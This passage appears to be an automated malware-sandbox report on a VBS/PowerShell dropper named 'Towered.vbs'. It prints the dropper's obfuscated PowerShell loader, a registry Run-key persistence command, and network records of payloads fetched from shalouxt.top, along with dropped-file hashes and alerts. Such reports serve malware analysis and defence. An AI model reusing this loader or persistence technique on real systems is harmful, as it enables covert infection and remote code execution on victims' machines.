DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;
(PID) Process:(5752) msiexec.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Assheadedness
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(5444) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Startup key
Value:
%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)
Executable files
0
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
6032powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sgr52g5g.kzj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mbfwkyqq.gcu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6032powershell.exeC:\Users\admin\AppData\Roaming\Harmonicas.Pretext
MD5:B6EBCA13C1166B6E313870874BBD4A62
SHA256:8A259A4CF428E6D215663307A2A38C1BD300E3B0B12347598B935AC2D5AD4375
6032powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lscqneuz.ras.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v4sla4jc.mzq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6032powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:8920E431E4BA01D5E988185E870048D1
SHA256:4ECD790A8F8EE9D0996D2D743B66E440B7594671DB813F9A63724B1B8A47836C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
24
DNS requests
8
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2480
RUXIMICS.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2480
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4932
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
188.114.96.3:443
https://shalouxt.top/Undershooting.hhk
unknown
text
411 Kb
GET
200
188.114.97.3:443
https://shalouxt.top/ulABmEdjFLhPwz78.bin
unknown
binary
280 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2480
RUXIMICS.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4932
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.23.209.191:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
2480
RUXIMICS.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4932
svchost.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.191
  • 2.23.209.185
  • 2.23.209.182
  • 2.23.209.181
  • 2.23.209.188
  • 2.23.209.193
  • 2.23.209.189
  • 2.23.209.180
  • 2.23.209.186
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.9
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
shalouxt.top
  • 188.114.97.3
  • 188.114.96.3
unknown
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
self.events.data.microsoft.com
  • 20.189.173.1
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Towered.vbs